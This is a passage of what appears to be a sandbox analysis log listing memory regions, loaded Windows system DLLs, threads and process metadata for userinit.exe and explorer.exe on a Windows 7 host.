"c:\\windows\\system32\\oleaut32.dll") Region: id = 38483 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 38484 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 38485 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 38486 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 38487 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38488 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 38489 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38490 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 38491 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38492 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38493 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38494 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38495 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38496 start_va = 0x630000 end_va = 0x8fefff entry_point = 0x630000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 38497 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 38498 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 38499 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 38500 start_va = 0xae0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 38501 start_va = 0xb70000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 38502 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38503 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 38504 start_va = 0x74be0000 end_va = 0x74bfdfff entry_point = 0x74be0000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 38505 start_va = 0x72ab0000 end_va = 0x72b33fff entry_point = 0x72ab0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 38506 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 38507 start_va = 0x771b0000 end_va = 0x77206fff entry_point = 0x771b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 38508 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 38509 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 38512 start_va = 0x74bc0000 end_va = 0x74bd1fff entry_point = 0x74bc0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 38513 start_va = 0x764a0000 end_va = 0x770e9fff entry_point = 0x764a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 38514 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 38515 start_va = 0x75060000 end_va = 0x75080fff entry_point = 0x75060000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 38516 start_va = 0x77730000 end_va = 0x77774fff entry_point = 0x77730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 38517 start_va = 0x72aa0000 end_va = 0x72aadfff entry_point = 0x72aa0000 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Thread: id = 1205 os_tid = 0x444 Thread: id = 1206 os_tid = 0x448 Thread: id = 1207 os_tid = 0x44c Thread: id = 1208 os_tid = 0x450 Thread: id = 1209 os_tid = 0x454 Thread: id = 1210 os_tid = 0x458 Thread: id = 1211 os_tid = 0x45c Process: id = "679" image_name = "userinit.exe" filename = "c:\\windows\\system32\\userinit.exe" page_root = "0x7f1d1240" os_pid = "0x468" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "666" os_parent_pid = "0x184" cmd_line = "C:\\Windows\\system32\\userinit.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000d91c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 38567 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 38568 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 38569 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 38570 start_va = 0x5d0000 end_va = 0x5d8fff entry_point = 0x5d0000 region_type = mapped_file name = "userinit.exe" filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe") Region: id = 38571 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 38572 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 38573 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 38574 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 38575 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 38577 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 38578 start_va = 0x1d0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 38579 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 38580 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 38581 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 38582 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 38583 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 38584 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 38585 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 38586 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 38587 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 38588 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 38589 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 38590 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 38591 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 38592 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 38593 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 38594 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 38595 start_va = 0x1d0000 end_va = 0x1ecfff entry_point = 0x1d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38596 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 38597 start_va = 0x1d0000 end_va = 0x1ecfff entry_point = 0x1d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38598 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38599 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 38600 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 38601 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 38602 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 38603 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 38604 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 38605 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 38606 start_va = 0x11e0000 end_va = 0x15d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 38607 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 38608 start_va = 0x200000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 38613 start_va = 0x15e0000 end_va = 0x16befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015e0000" filename = "" Region: id = 38614 start_va = 0x74750000 end_va = 0x74762fff entry_point = 0x74750000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 38615 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 38616 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38617 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Thread: id = 1214 os_tid = 0x46c Process: id = "680" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7f1d1260" os_pid = "0x470" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "679" os_parent_pid = "0x468" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000d91c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 38618 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 38619 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 38620 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 38621 start_va = 0xcb0000 end_va = 0xf30fff entry_point = 0xcb0000 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 38622 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 38623 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 38624 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 38625 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 38626 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 38629 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 38630 start_va = 0x1d0000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 38631 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 38632 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 38633 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 38634 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 38635 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 38636 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 38637 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 38638 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 38639 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 38640 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 38641 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 38642 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 38643 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 38644 start_va = 0x771b0000 end_va = 0x77206fff entry_point = 0x771b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 38645 start_va = 0x764a0000 end_va = 0x770e9fff entry_point = 0x764a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 38646 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38647 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 38648 start_va = 0x72910000 end_va = 0x72a7efff entry_point = 0x72910000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 38649 start_va = 0x74800000 end_va = 0x7482efff entry_point = 0x74800000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 38650 start_va = 0x74830000 end_va = 0x748e1fff entry_point = 0x74830000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 38651 start_va = 0x20000 end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 38652 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38653 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 38654 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 38655 start_va = 0x74220000 end_va = 0x74244fff entry_point = 0x74220000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 38656 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 38657 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 38658 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 38659 start_va = 0x74750000 end_va = 0x74762fff entry_point = 0x74750000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 38660 start_va = 0x73f40000 end_va = 0x73f49fff entry_point = 0x73f40000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 38661 start_va = 0x748f0000 end_va = 0x74a7ffff entry_point = 0x748f0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 38662 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 38663 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 38664 start_va = 0x74ac0000 end_va = 0x74bb4fff entry_point = 0x74ac0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 38665 start_va = 0x370000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 38666 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 38667 start_va = 0x1d0000 end_va = 0x1d6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 38668 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 38669 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 38670 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 38671 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 38672 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 38673 start_va = 0x570000 end_va = 0x962fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 38674 start_va = 0xf40000 end_va = 0x1b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 38675 start_va = 0x210000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 38676 start_va = 0x370000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 38677 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 38678 start_va = 0x970000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 38679 start_va = 0xb40000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 38680 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 38681 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 38682 start_va = 0xb80000 end_va = 0xc5efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 38683 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 38684 start_va = 0x1b40000 end_va = 0x1e0efff entry_point = 0x1b40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 38685 start_va = 0x3f0000 end_va = 0x44bfff entry_point = 0x3f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38686 start_va = 0x3f0000 end_va = 0x44bfff entry_point = 0x3f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38687 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 